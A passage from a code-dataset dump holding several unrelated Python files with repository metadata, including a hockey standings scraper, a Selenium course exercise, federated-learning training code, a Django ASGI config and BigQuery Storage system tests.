('**Central Div**')\n cenDiv = westConf.find_all(\"div\", {\"class\":\"central\"})\n cenplaces = cenDiv[0].find_all(\"span\", {\"class\":\"teamPlace\"})\n cencommons = cenDiv[0].find_all(\"span\", {\"class\":\"teamCommon\"})\n wc_cenplace = {}\n i = 0\n for cenplace in cenplaces:\n #print cenplace.text\n wc_cenplace[i] = cenplace.text\n i = i + 1\n\n wc_cencommon = {}\n j = 0\n for cencommon in cencommons:\n #print cencommon.text\n wc_cencommon[j] = cencommon.text\n j = j + 1\n\n print ('--------------EAST-CONF-------------------')\n eastConf = item.contents[1]\n print ('**Atlantic Div**')\n atlDiv = eastConf.find_all(\"div\", {\"class\":\"atlantic\"})\n atlplaces = atlDiv[0].find_all(\"span\", {\"class\":\"teamPlace\"})\n atlcommons = atlDiv[0].find_all(\"span\", {\"class\":\"teamCommon\"})\n ec_atlplace = {}\n a = 0\n for atlplace in atlplaces:\n #print atlplace.text\n ec_atlplace[a] = atlplace.text\n a = a + 1\n\n ec_atlcommon = {}\n b = 0\n for atlcommon in atlcommons:\n #print atlcommon.text\n ec_atlcommon[b] = atlcommon.text\n b = b + 1\n\n print ('**Metropolitan Div**')\n metDiv = eastConf.find_all(\"div\", {\"class\":\"metropolitan\"})\n metplaces = metDiv[0].find_all(\"span\", {\"class\":\"teamPlace\"})\n metcommons = metDiv[0].find_all(\"span\", {\"class\":\"teamCommon\"})\n ec_metplace = {}\n c = 0\n for metplace in metplaces:\n #print metplace.text\n ec_metplace[c] = metplace.text\n c = c + 1\n\n ec_metcommon = {}\n d = 0\n for metcommon in metcommons:\n #print metcommon.text\n ec_metcommon[d] = metcommon.text\n d = d + 1\n\n#Insert Western Conference teams into database\nfor x in range(0,7):\n teampac = {\"TeamCity\":wc_pacplace[x],\n \"TeamName\":wc_paccommon[x],\n \"Conference\":\"Western\",\n \"Division\":\"Pacific\"}\n\n team_id = teams.insert_one(teampac).inserted_id\n\n teamcen = {\"TeamCity\":wc_cenplace[x],\n \"TeamName\":wc_cencommon[x],\n \"Conference\":\"Western\",\n \"Division\":\"Central\"}\n\n team_id = teams.insert_one(teamcen).inserted_id\n\n#Insert Eastern Conference teams into database\nfor x in range(0,8):\n teamatl = {\"TeamCity\":ec_atlplace[x],\n \"TeamName\":ec_atlcommon[x],\n \"Conference\":\"Eastern\",\n \"Division\":\"Atlantic\"}\n\n team_id = teams.insert_one(teamatl).inserted_id\n\n teammet = {\"TeamCity\":ec_metplace[x],\n \"TeamName\":ec_metcommon[x],\n \"Conference\":\"Eastern\",\n \"Division\":\"Metropolitan\"}\n\n team_id = teams.insert_one(teammet).inserted_id\n\n#Display team data\nprint ('My wc_pacplace var: ')\nfor k, v in wc_pacplace.iteritems():\n print (k,v)\nprint ('My wc_paccommon var: ')\nfor k, v in wc_paccommon.iteritems():\n print (k,v)\nprint ('My wc_cenplace var: ')\nfor k, v in wc_cenplace.iteritems():\n print (k,v)\nprint ('My wc_cencommon var: ')\nfor k, v in wc_cencommon.iteritems():\n print (k,v)\n\nprint ('My ec_atlplace var: ')\nfor k, v in ec_atlplace.iteritems():\n print (k,v)\nprint ('My ec_atlcommon var: ')\nfor k, v in ec_atlcommon.iteritems():\n print (k,v)\nprint ('My ec_metplace var: ')\nfor k, v in ec_metplace.iteritems():\n print (k,v)\nprint ('My ec_metcommon var: ')\nfor k, v in ec_metcommon.iteritems():\n print (k,v)\n\n","repo_name":"dSerk/Adjunct-junk","sub_path":"MasterPlan/MasterPlan.py","file_name":"MasterPlan.py","file_ext":"py","file_size_in_byte":4360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36426004233","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nimport math\nimport time\n\ndef calc(x: str) -> str:\n return str(math.log(abs(12*math.sin(int(x)))))\n\n\nlink = 'http://suninjuly.github.io/get_attribute.html'\nbrowser = webdriver.Chrome()\nbrowser.get(link)\n\n# find image with treasure chest\n# get x - valuex attribute\ntreasure_chest = browser.find_element(By.ID, 'treasure')\nx_value = treasure_chest.get_attribute('valuex')\n\n# get calc(x)\ny_value = calc(x_value)\n\n# put result\nanswer_field = browser.find_element(By.ID, 'answer')\nanswer_field.send_keys(y_value)\n\n# check robot checkbox\nrobot_checkbox = browser.find_element(By.ID, 'robotCheckbox')\nrobot_checkbox.click()\n\n# robot radiobutton\nrobot_radiobutton = browser.find_element(By.ID, 'robotsRule')\nrobot_radiobutton.click()\n\n# submit\nsubmit_button = browser.find_element(By.CSS_SELECTOR, \"[type='submit']\")\nsubmit_button.click()\n\ntime.sleep(10)","repo_name":"malovichka/stepik_auto_tests_course","sub_path":"part 2/lesson1_step7.py","file_name":"lesson1_step7.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5189595117","text":"import argparse\n\n\ndef get_arguments():\n \"\"\"Kijkt wat je als argumenten hebt ingegeven by het runnen van het pythonscript.\n Geeft ook vanzelf handige errormessages, and een help pagina.\n Als je de helppagina wilt gebruiken type in uw powershell: python brainfuck.py -h\"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"file\",\n help=\"The brainfuck script you want to run\"\n )\n parser.add_argument(\n \"-l\", \"--length\",\n help=\"the length of the memory (30)\",\n type=int\n )\n parser.add_argument(\n \"-x\", \"--hex\",\n help=\"display the memory in hex\", action=\"store_true\"\n )\n parser.add_argument(\n \"-a\", \"--ascii\",\n help=\"display the output in ascii\", action=\"store_true\"\n )\n parser.add_argument(\n \"-e\", \"--edit\",\n help=\"edit file\", action=\"store_true\"\n )\n parser.add_argument(\n \"-n\", \"--new\",\n help=\"create new file\", action=\"store_true\"\n )\n parser.add_argument(\n \"-d\", \"--debug\",\n help=\"werkt nog niet.\", action=\"store_true\"\n )\n return get_config(parser.parse_args())\n\n\ndef get_config(args):\n return {\n \"file\": args.file,\n \"length\": args.length if args.length else 30,\n \"hex\": args.hex,\n \"ascii\": args.ascii,\n \"edit\": args.edit,\n \"new\": args.new and args.edit,\n \"debug\": args.debug\n }\n","repo_name":"BenJStoffels/Brainfuck","sub_path":"brainfuck_compiler/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30033679114","text":"'''\nCode is based on\nhttps://github.com/taoyang1122/GradAug,\nhttps://github.com/taoyang1122/MutualNet.\nAlso, Lipschitz related functions are from\nhttps://github.com/42Shawn/LONDON/tree/master\n'''\n\nimport random\nimport torch\nimport torch.nn.functional as F\n\nimport logging\nfrom methods.base import Base_Client, Base_Server\nimport torch.nn.functional as F\nimport models.ComputePostBN as pbn\nfrom torch.multiprocessing import current_process\nimport numpy as np\nimport random\n\nclass Client(Base_Client):\n def __init__(self, client_dict, args):\n super().__init__(client_dict, args)\n self.model = self.model_type(self.num_classes).to(self.device)\n self.criterion = torch.nn.CrossEntropyLoss().to(self.device)\n self.optimizer = torch.optim.SGD(self.model.parameters(), lr=self.args.lr, momentum=0.9, weight_decay=self.args.wd, nesterov=True)\n self.width_range = client_dict['width_range']\n self.resolutions = client_dict['resolutions']\n self.num_sub = args.num_subnets-1\n\n def train(self):\n # train the local model\n self.model.to(self.device)\n self.model.train()\n epoch_loss = []\n for epoch in range(self.args.epochs):\n batch_loss = []\n for batch_idx, (images, labels) in enumerate(self.train_dataloader):\n images, labels = images.to(self.device, non_blocking=True), labels.to(self.device, non_blocking=True)\n self.optimizer.zero_grad()\n \n self.model.apply(lambda m: setattr(m, 'width_mult', self.width_range[-1]))\n t_feats, t_out = self.model.extract_feature(images)\n loss = self.criterion(t_out, labels)\n loss.backward()\n loss_CE = loss.item()\n self.model.apply(lambda m: setattr(m, 'width_mult', self.width_range[0]))\n s_feats = self.model.reuse_feature(t_feats[-2].detach())\n \n # Lipschitz loss\n TM_s = torch.bmm(self.transmitting_matrix(s_feats[-2], s_feats[-1]), self.transmitting_matrix(s_feats[-2], s_feats[-1]).transpose(2,1))\n TM_t = torch.bmm(self.transmitting_matrix(t_feats[-2].detach(), t_feats[-1].detach()), self.transmitting_matrix(t_feats[-2].detach(), t_feats[-1].detach()).transpose(2,1))\n loss = F.mse_loss(self.top_eigenvalue(K=TM_s), self.top_eigenvalue(K=TM_t))\n loss = self.args.mu*(loss_CE/loss.item())*loss\n loss.backward()\n torch.nn.utils.clip_grad_norm_(self.model.parameters(), 10.0)\n self.optimizer.step()\n batch_loss.append(loss.item())\n if len(batch_loss) > 0:\n epoch_loss.append(sum(batch_loss) / len(batch_loss))\n logging.info('(client {}. Local Training Epoch: {} \\tLoss: {:.6f} Thread {} Map {}'.format(self.client_index,\n epoch, sum(epoch_loss) / len(epoch_loss), current_process()._identity[0], self.client_map[self.round]))\n weights = self.model.cpu().state_dict()\n return weights\n\n def transmitting_matrix(self, fm1, fm2):\n if fm1.size(2) > fm2.size(2):\n fm1 = F.adaptive_avg_pool2d(fm1, (fm2.size(2), fm2.size(3)))\n\n fm1 = fm1.view(fm1.size(0), fm1.size(1), -1)\n fm2 = fm2.view(fm2.size(0), fm2.size(1), -1).transpose(1, 2)\n\n fsp = torch.bmm(fm1, fm2) / fm1.size(2)\n return fsp\n\n def top_eigenvalue(self, K, n_power_iterations=10, dim=1):\n v = torch.ones(K.shape[0], K.shape[1], 1).to(self.device)\n for _ in range(n_power_iterations):\n m = torch.bmm(K, v)\n n = torch.norm(m, dim=1).unsqueeze(1)\n v = m / n\n\n top_eigenvalue = torch.sqrt(n / torch.norm(v, dim=1).unsqueeze(1))\n return top_eigenvalue\n\n def test(self):\n self.model.to(self.device)\n self.model.eval()\n test_correct = 0.0\n test_loss = 0.0\n test_sample_number = 0.0\n with torch.no_grad():\n ###\n self.model.apply(lambda m: setattr(m, 'width_mult', self.width_range[-1]))\n self.model = pbn.ComputeBN(self.model, self.train_dataloader, self.resolutions[0], self.device)\n ###\n for batch_idx, (x, target) in enumerate(self.train_dataloader):\n x = x.to(self.device)\n target = target.to(self.device)\n\n pred = self.model(x)\n # loss = self.criterion(pred, target)\n _, predicted = torch.max(pred, 1)\n correct = predicted.eq(target).sum()\n\n test_correct += correct.item()\n # test_loss += loss.item() * target.size(0)\n test_sample_number += target.size(0)\n acc = (test_correct / test_sample_number)*100\n logging.info(\"************* Client {} Acc = {:.2f} **************\".format(self.client_index, acc))\n return acc\n\nclass Server(Base_Server):\n def __init__(self,server_dict, args):\n super().__init__(server_dict, args)\n self.model = self.model_type(self.num_classes)\n\n def test(self):\n self.model.to(self.device)\n self.model.eval()\n\n test_correct = 0.0\n test_loss = 0.0\n test_sample_number = 0.0\n with torch.no_grad():\n ###\n self.model.apply(lambda m: setattr(m, 'width_mult', 1.0))\n ###\n for batch_idx, (x, target) in enumerate(self.test_data):\n x = x.to(self.device)\n target = target.to(self.device)\n\n pred = self.model(x)\n # loss = self.criterion(pred, target)\n _, predicted = torch.max(pred, 1)\n correct = predicted.eq(target).sum()\n\n test_correct += correct.item()\n # test_loss += loss.item() * target.size(0)\n test_sample_number += target.size(0)\n acc = (test_correct / test_sample_number)*100\n logging.info(\"************* Server Acc = {:.2f} **************\".format(acc))\n return acc","repo_name":"mmendiet/FedAlign","sub_path":"methods/fedalign.py","file_name":"fedalign.py","file_ext":"py","file_size_in_byte":6162,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"53"} +{"seq_id":"2948330153","text":"\"\"\"\nASGI config for djangoserver project.\n\nIt exposes the ASGI callable as a module-level variable named ``application``.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/4.1/howto/deployment/asgi/\n\"\"\"\n\nfrom django.core.asgi import get_asgi_application\nfrom channels.routing import ProtocolTypeRouter, URLRouter\nfrom chat.routing import websocket_urlpatterns\n\ndjango_asgi_app = get_asgi_application()\n\n# the websocket will open at 127.0.0.1:8000/ws/\napplication = ProtocolTypeRouter({\n 'http': django_asgi_app,\n 'websocket':\n URLRouter(\n websocket_urlpatterns\n )\n ,\n})\n","repo_name":"njNafir/heaven","sub_path":"backend/djangoserver/asgi.py","file_name":"asgi.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"26095441212","text":"import copy\nimport datetime as dt\nimport decimal\nimport json\nimport io\nimport re\n\nimport pytest\nimport pytz\n\nfrom google.cloud import bigquery\nfrom google.cloud import bigquery_storage_v1beta1\nfrom google.protobuf import timestamp_pb2\n\n\n# TODO: remove once a similar method is implemented in the library itself\n# https://github.com/googleapis/google-cloud-python/issues/4553\ndef _add_rows(table_ref, new_data, bq_client, partition_suffix=\"\"):\n \"\"\"Insert additional rows into an existing table.\n\n Args:\n table_ref (bigquery_storage_v1beta1.types.TableReference):\n A reference to the target table.\n new_data (Iterable[Dict[str, Any]]):\n New data to insert with each row represented as a dictionary.\n The keys must match the table column names, and the values\n must be JSON serializable.\n bq_client (bigquery.Client):\n A BigQuery client instance to use for API calls.\n partition_suffix (str):\n An option suffix to append to the table_id, useful for selecting\n partitions of ingestion-time partitioned tables.\n \"\"\"\n job_config = bigquery.LoadJobConfig(\n source_format=bigquery.SourceFormat.NEWLINE_DELIMITED_JSON\n )\n\n new_data_str = u\"\\n\".join(json.dumps(item) for item in new_data)\n new_data_file = io.BytesIO(new_data_str.encode())\n\n destination_ref = bigquery.table.TableReference.from_api_repr(\n {\n \"projectId\": table_ref.project_id,\n \"datasetId\": table_ref.dataset_id,\n \"tableId\": table_ref.table_id + partition_suffix,\n }\n )\n job = bq_client.load_table_from_file(\n new_data_file, destination=destination_ref, job_config=job_config\n )\n job.result() # wait for the load to complete\n\n\n@pytest.mark.parametrize(\n \"data_format,expected_schema_type\",\n (\n (None, \"avro_schema\"), # Default format (Avro).\n (bigquery_storage_v1beta1.enums.DataFormat.AVRO, \"avro_schema\"),\n (bigquery_storage_v1beta1.enums.DataFormat.ARROW, \"arrow_schema\"),\n ),\n)\ndef test_read_rows_as_blocks_full_table(\n client, project_id, small_table_reference, data_format, expected_schema_type\n):\n session = client.create_read_session(\n small_table_reference,\n \"projects/{}\".format(project_id),\n format_=data_format,\n requested_streams=1,\n )\n stream_pos = bigquery_storage_v1beta1.types.StreamPosition(\n stream=session.streams[0]\n )\n schema_type = session.WhichOneof(\"schema\")\n assert schema_type == expected_schema_type\n\n blocks = list(client.read_rows(stream_pos))\n\n assert len(blocks) > 0\n block = blocks[0]\n assert block.status.estimated_row_count > 0\n\n\n@pytest.mark.parametrize(\n \"data_format,expected_schema_type\",\n (\n (bigquery_storage_v1beta1.enums.DataFormat.AVRO, \"avro_schema\"),\n (bigquery_storage_v1beta1.enums.DataFormat.ARROW, \"arrow_schema\"),\n ),\n)\ndef test_read_rows_as_rows_full_table(\n client, project_id, small_table_reference, data_format, expected_schema_type\n):\n session = client.create_read_session(\n small_table_reference,\n \"projects/{}\".format(project_id),\n format_=data_format,\n requested_streams=1,\n )\n stream_pos = bigquery_storage_v1beta1.types.StreamPosition(\n stream=session.streams[0]\n )\n\n rows = list(client.read_rows(stream_pos).rows(session))\n\n assert len(rows) > 0\n\n\n@pytest.mark.parametrize(\n \"data_format\",\n (\n (bigquery_storage_v1beta1.enums.DataFormat.AVRO),\n (bigquery_storage_v1beta1.enums.DataFormat.ARROW),\n ),\n)\ndef test_basic_nonfiltered_read(client, project_id, table_with_data_ref, data_format):\n session = client.create_read_session(\n table_with_data_ref,\n \"projects/{}\".format(project_id),\n format_=data_format,\n requested_streams=1,\n )\n stream_pos = bigquery_storage_v1beta1.types.StreamPosition(\n stream=session.streams[0]\n )\n\n rows = list(client.read_rows(stream_pos).rows(session))\n\n assert len(rows) == 5 # all table rows\n\n\ndef test_filtered_rows_read(client, project_id, table_with_data_ref):\n read_options = bigquery_storage_v1beta1.types.TableReadOptions()\n read_options.row_restriction = \"age >= 50\"\n\n session = client.create_read_session(\n table_with_data_ref,\n \"projects/{}\".format(project_id),\n format_=bigquery_storage_v1beta1.enums.DataFormat.AVRO,\n requested_streams=1,\n read_options=read_options,\n )\n stream_pos = bigquery_storage_v1beta1.types.StreamPosition(\n stream=session.streams[0]\n )\n\n rows = list(client.read_rows(stream_pos).rows(session))\n\n assert len(rows) == 2\n\n\n@pytest.mark.parametrize(\n \"data_format\",\n (\n (bigquery_storage_v1beta1.enums.DataFormat.AVRO),\n (bigquery_storage_v1beta1.enums.DataFormat.ARROW),\n ),\n)\ndef test_column_selection_read(client, project_id, table_with_data_ref, data_format):\n read_options = bigquery_storage_v1beta1.types.TableReadOptions()\n read_options.selected_fields.append(\"first_name\")\n read_options.selected_fields.append(\"age\")\n\n session = client.create_read_session(\n table_with_data_ref,\n \"projects/{}\".format(project_id),\n format_=data_format,\n requested_streams=1,\n read_options=read_options,\n )\n stream_pos = bigquery_storage_v1beta1.types.StreamPosition(\n stream=session.streams[0]\n )\n\n rows = list(client.read_rows(stream_pos).rows(session))\n\n for row in rows:\n assert sorted(row.keys()) == [\"age\", \"first_name\"]\n\n\ndef test_snapshot(client, project_id, table_with_data_ref, bq_client):\n before_new_data = timestamp_pb2.Timestamp()\n before_new_data.GetCurrentTime()\n\n # load additional data into the table\n new_data = [\n {u\"first_name\": u\"NewGuyFoo\", u\"last_name\": u\"Smith\", u\"age\": 46},\n {u\"first_name\": u\"NewGuyBar\", u\"last_name\": u\"Jones\", u\"age\": 30},\n ]\n _add_rows(table_with_data_ref, new_data, bq_client)\n\n # read data using the timestamp before the additional data load\n session = client.create_read_session(\n table_with_data_ref,\n \"projects/{}\".format(project_id),\n format_=bigquery_storage_v1beta1.enums.DataFormat.AVRO,\n requested_streams=1,\n table_modifiers={\"snapshot_time\": before_new_data},\n )\n stream_pos = bigquery_storage_v1beta1.types.StreamPosition(\n stream=session.streams[0]\n )\n\n rows = list(client.read_rows(stream_pos).rows(session))\n\n # verify that only the data before the timestamp was returned\n assert len(rows) == 5 # all initial records\n\n for row in rows:\n assert \"NewGuy\" not in row[\"first_name\"] # no new records\n\n\ndef test_column_partitioned_table(\n client, project_id, col_partition_table_ref, bq_client\n):\n data = [\n {\"description\": \"Tracking established.\", \"occurred\": \"2017-02-15\"},\n {\"description\": \"Look, a solar eclipse!\", \"occurred\": \"2018-02-15\"},\n {\"description\": \"Fake solar eclipse reported.\", \"occurred\": \"2018-02-15\"},\n {\"description\": \"1 day after false eclipse report.\", \"occurred\": \"2018-02-16\"},\n {\"description\": \"1 year after false eclipse report.\", \"occurred\": \"2019-02-15\"},\n ]\n\n _add_rows(col_partition_table_ref, data, bq_client)\n\n # Read from the table with a partition filter specified, and verify that\n # only the expected data is returned.\n read_options = bigquery_storage_v1beta1.types.TableReadOptions()\n read_options.row_restriction = \"occurred = '2018-02-15'\"\n\n session = client.create_read_session(\n col_partition_table_ref,\n \"projects/{}\".format(project_id),\n format_=bigquery_storage_v1beta1.enums.DataFormat.AVRO,\n requested_streams=1,\n read_options=read_options,\n )\n\n assert session.streams # there should be some data to fetch\n\n stream_pos = bigquery_storage_v1beta1.types.StreamPosition(\n stream=session.streams[0]\n )\n rows = list(client.read_rows(stream_pos).rows(session))\n\n assert len(rows) == 2\n\n expected_descriptions = (\"Look, a solar eclipse!\", \"Fake solar eclipse reported.\")\n for row in rows:\n assert row[\"occurred\"] == dt.date(2018, 2, 15)\n assert row[\"description\"] in expected_descriptions\n\n\n@pytest.mark.parametrize(\n \"data_format\",\n (\n (bigquery_storage_v1beta1.enums.DataFormat.AVRO),\n (bigquery_storage_v1beta1.enums.DataFormat.ARROW),\n ),\n)\ndef test_ingestion_time_partitioned_table(\n client, project_id, ingest_partition_table_ref, bq_client, data_format\n):\n data = [{\"shape\": \"cigar\", \"altitude\": 1200}, {\"shape\": \"disc\", \"altitude\": 750}]\n _add_rows(ingest_partition_table_ref, data, bq_client, partition_suffix=\"$20190809\")\n\n data = [\n {\"shape\": \"sphere\", \"altitude\": 3500},\n {\"shape\": \"doughnut\", \"altitude\": 100},\n ]\n _add_rows(ingest_partition_table_ref, data, bq_client, partition_suffix=\"$20190810\")\n\n data = [\n {\"shape\": \"elephant\", \"altitude\": 1},\n {\"shape\": \"rocket\", \"altitude\": 12700},\n ]\n _add_rows(ingest_partition_table_ref, data, bq_client, partition_suffix=\"$20190811\")\n\n read_options = bigquery_storage_v1beta1.types.TableReadOptions()\n read_options.row_restriction = \"DATE(_PARTITIONTIME) = '2019-08-10'\"\n\n session = client.create_read_session(\n ingest_partition_table_ref,\n \"projects/{}\".format(project_id),\n format_=data_format,\n requested_streams=1,\n read_options=read_options,\n )\n\n assert session.streams # there should be some data to fetch\n\n stream_pos = bigquery_storage_v1beta1.types.StreamPosition(\n stream=session.streams[0]\n )\n rows = list(client.read_rows(stream_pos).rows(session))\n assert len(rows) == 2\n\n actual_items = {(row[\"shape\"], row[\"altitude\"]) for row in rows}\n expected_items = {(\"sphere\", 3500), (\"doughnut\", 100)}\n assert actual_items == expected_items\n\n\n@pytest.mark.parametrize(\n \"data_format\",\n (\n (bigquery_storage_v1beta1.enums.DataFormat.AVRO),\n (bigquery_storage_v1beta1.enums.DataFormat.ARROW),\n ),\n)\ndef test_decoding_data_types(\n client, project_id, all_types_table_ref, bq_client, data_format\n):\n data = [\n {\n u\"string_field\": u\"Price: € 9.95.\",\n u\"bytes_field\": bigquery._helpers._bytes_to_json(b\"byteees\"),\n u\"int64_field\": -1085,\n u\"float64_field\": -42.195,\n u\"numeric_field\": \"1.4142\",\n u\"bool_field\": True,\n u\"geography_field\": '{\"type\": \"Point\", \"coordinates\": [-49.3028, 69.0622]}',\n u\"person_struct_field\": {u\"name\": u\"John\", u\"age\": 42},\n u\"timestamp_field\": 1565357902.017896, # 2019-08-09T13:38:22.017896\n u\"date_field\": u\"1995-03-17\",\n u\"time_field\": u\"16:24:51\",\n u\"datetime_field\": u\"2005-10-26T19:49:41\",\n u\"string_array_field\": [u\"foo\", u\"bar\", u\"baz\"],\n }\n ]\n\n _add_rows(all_types_table_ref, data, bq_client)\n\n session = client.create_read_session(\n all_types_table_ref,\n \"projects/{}\".format(project_id),\n format_=data_format,\n requested_streams=1,\n )\n\n assert session.streams # there should be data available\n\n stream_pos = bigquery_storage_v1beta1.types.StreamPosition(\n stream=session.streams[0]\n )\n\n rows = list(client.read_rows(stream_pos).rows(session))\n\n expected_result = {\n u\"string_field\": u\"Price: € 9.95.\",\n u\"bytes_field\": b\"byteees\",\n u\"int64_field\": -1085,\n u\"float64_field\": -42.195,\n u\"numeric_field\": decimal.Decimal(\"1.4142\"),\n u\"bool_field\": True,\n u\"geography_field\": \"POINT(-49.3028 69.0622)\",\n u\"person_struct_field\": {u\"name\": u\"John\", u\"age\": 42},\n u\"timestamp_field\": dt.datetime(2019, 8, 9, 13, 38, 22, 17896, tzinfo=pytz.UTC),\n u\"date_field\": dt.date(1995, 3, 17),\n u\"time_field\": dt.time(16, 24, 51),\n u\"string_array_field\": [u\"foo\", u\"bar\", u\"baz\"],\n }\n\n result_copy = copy.copy(rows[0])\n del result_copy[\"datetime_field\"]\n assert result_copy == expected_result\n\n # Compare datetime separately, AVRO and PYARROW return different object types,\n # although they should both represent the same value.\n # TODO: when fixed, change assertion to assert a datetime instance!\n expected_pattern = re.compile(r\"2005-10-26( |T)19:49:41\")\n assert expected_pattern.match(str(rows[0][\"datetime_field\"]))\n\n\n@pytest.mark.parametrize(\n \"data_format\",\n (\n (bigquery_storage_v1beta1.enums.DataFormat.AVRO),\n (bigquery_storage_v1beta1.enums.DataFormat.ARROW),\n ),\n)\ndef test_resuming_read_from_offset(client, project_id, data_format):\n shakespeare_ref = bigquery_storage_v1beta1.types.TableReference()\n shakespeare_ref.project_id = project_id\n shakespeare_ref.dataset_id = \"public_samples_copy\"\n shakespeare_ref.table_id = \"shakespeare\"\n\n read_session = client.create_read_session(\n shakespeare_ref,\n \"projects/{}\".format(project_id),\n format_=data_format,\n requested_streams=1,\n )\n\n assert read_session.streams # there should be data available\n\n stream_pos = bigquery_storage_v1beta1.types.StreamPosition(\n stream=read_session.streams[0], offset=0\n )\n read_rows_stream = client.read_rows(stream_pos)\n\n # fetch the first two batches of rows\n rows_iter = iter(read_rows_stream)\n some_rows = next(rows_iter)\n more_rows = next(rows_iter)\n\n # fetch the rest of the rows using the stream offset\n new_stream_pos = bigquery_storage_v1beta1.types.StreamPosition(\n stream=read_session.streams[0], offset=some_rows.row_count + more_rows.row_count\n )\n remaining_rows_count = sum(\n 1 for _ in client.read_rows(new_stream_pos).rows(read_session)\n )\n\n # verify that the counts match\n expected_len = 164656 # total rows in shakespeare table\n actual_len = remaining_rows_count + some_rows.row_count + more_rows.row_count\n assert actual_len == expected_len\n","repo_name":"beittatt/cloud-python","sub_path":"bigquery_storage/tests/system/test_reader.py","file_name":"test_reader.py","file_ext":"py","file_size_in_byte":14139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11275870693","text":"\nfrom tkinter import *\nfrom tkinter import ttk\nfrom PIL import ImageTk, Image\nimport time\n\nprint(\"test\")\n\nbox = Tk()\nbox.geometry(\"600x600\")\nLabel(box, text=\"First\").grid(row=0, sticky=W)\nLabel(box, text=\"Second\").grid(row=1, sticky=W)\n\ne1 = Entry(box)\ne2 = Entry(box)\n\ne1.grid(row=0, column=1)\ne2.grid(row=1, column=2)\n\npict2 = Image.open(\"S.jpg\")\nimg2 = ImageTk.PhotoImage(pict2)\nlabel = Label(image=img2)\nlabel.grid(row=1, column=3)\n\nbox.mainloop()\n","repo_name":"LinuxLou2022/pythonProject01","sub_path":"test01.py","file_name":"test01.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72434585127","text":"\n\nimport logging\nimport os\n\nimport numpy as np\nimport pandas as pd\n\n\nlogger = logging.getLogger(__name__)\n\n\ndef undupe_column_names(df, template=\"{} ({})\"):\n \"\"\"\n rename df column names so there are no duplicates (in place)\n\n e.g. if there are two columns named \"dog\", the second column will be reformatted to \"dog (2)\"\n\n Parameters\n ----------\n df : pandas.DataFrame\n dataframe whose column names should be de-duplicated\n template : template taking two arguments (old_name, int) to use to rename columns\n\n Returns\n -------\n df : pandas.DataFrame\n dataframe that was renamed in place, for convenience in chaining\n \"\"\"\n\n new_names = []\n seen = set()\n for name in df.columns:\n n = 1\n new_name = name\n while new_name in seen:\n n += 1\n new_name = template.format(name, n)\n new_names.append(new_name)\n seen.add(new_name)\n df.columns = new_names\n return df\n\n\ndef read_buffer_spec(fname,\n description_name=\"Description\",\n target_name=\"Target\",\n variable_name=\"Variable\",\n target_df_name=\"TargetDF\",\n expression_name=\"Expression\"\n ):\n\n \"\"\"\n Read a CSV model specification into a Pandas DataFrame or Series.\n\n The CSV is expected to have columns for component descriptions\n targets, and expressions,\n\n The CSV is required to have a header with column names. For example:\n\n Description,Target,Variable, TargetDF, Expression\n\n Parameters\n ----------\n fname : str\n Name of a CSV spec file.\n description_name : str, optional\n Name of the column in `fname` that contains the component description.\n target_name : str, optional\n Name of the column in `fname` that contains the component target.\n variable_name : str, optional\n Name of the column in `fname` that contains the variable target.\n target_df_name : str, optional\n Name of the column in `fname` that contains the target dataframe.\n expression_name : str, optional\n Name of the column in `fname` that contains the component expression.\n\n\n Returns\n -------\n spec : pandas.DataFrame\n dataframe with three columns: ['description' 'variable' 'target_df' 'target' 'expression']\n \"\"\"\n\n cfg = pd.read_csv(fname, comment='#')\n\n # drop null expressions\n # cfg = cfg.dropna(subset=[expression_name])\n\n cfg.rename(columns={target_name: 'target',\n expression_name: 'expression',\n description_name: 'description',\n variable_name: 'variable',\n target_df_name: 'target_df'},\n inplace=True)\n\n # backfill description\n if 'description' not in cfg.columns:\n cfg.description = ''\n\n cfg.target = cfg.target.str.strip()\n cfg.expression = cfg.expression.str.strip()\n\n return cfg\n\n\nclass NumpyLogger(object):\n def __init__(self, logger):\n self.logger = logger\n self.target = ''\n self.expression = ''\n\n def write(self, msg):\n self.logger.error(\"numpy warning: %s\" % (msg.rstrip()))\n self.logger.error(\"expression: %s = %s\" % (str(self.target), str(self.expression)))\n\n\ndef buffer_variables(buffer_expressions,\n zone_df_name, locals_dict,\n df_alias=None, trace_rows=None):\n \"\"\"\n Perform network accessibility calculations (using Pandana libary\n http://udst.github.io/pandana/) on point based data (e.g. zone\n centroids) using a set of expressions from a spec in the context of\n a given data table.\n\n Expressions are evaluated using Python's eval function.\n Python expressions have access to variables in locals_d.\n They also have access to previously assigned\n targets as the assigned target name.\n\n zone_df_name is the name of the data frame in locals_dict, which represents\n point data, to which all buffering and network distance measurements are\n applied. In order to do this, each row (point) in zone_df must be associated with it's\n nearest node in the Pandana network. This is achieved using the Pandana method\n network.get_node_ids. The buffering operations are performed on each node in the\n network, thus allowing the results to be joined to the zone df via node_id. Only\n the results that share the same nodes in the zone_df_name data frame\n are returned.\n\n For example, in order to find the distance of each zone to the nearest\n bus stop, we need a data frame representing bus stop locations and their\n nearest network node. Pandana then finds the distance from every node in\n the network to the nearest node that represents a bus stop. Next, only\n the distances for nodes that are associated with the zone dataframe are\n kept and the results are indexed to the zone dataframe.\n\n lowercase variables starting with underscore are temp variables (e.g. _local_var)\n and not returned except in trace_restults\n\n uppercase variables starting with underscore are temp variables (e.g. _LOCAL_SCALAR)\n and not returned except in trace_assigned_locals\n This is useful for defining general purpose local constants in expression file\n\n Users should take care that expressions should result in\n a Pandas Series (scalars will be automatically promoted to series.)\n\n Parameters\n ----------\n buffer_expressions : pandas.DataFrame of target assignment expressions\n target: target column names\n variable: target variable to be buffered\n target_df: datafram that contains the variable to 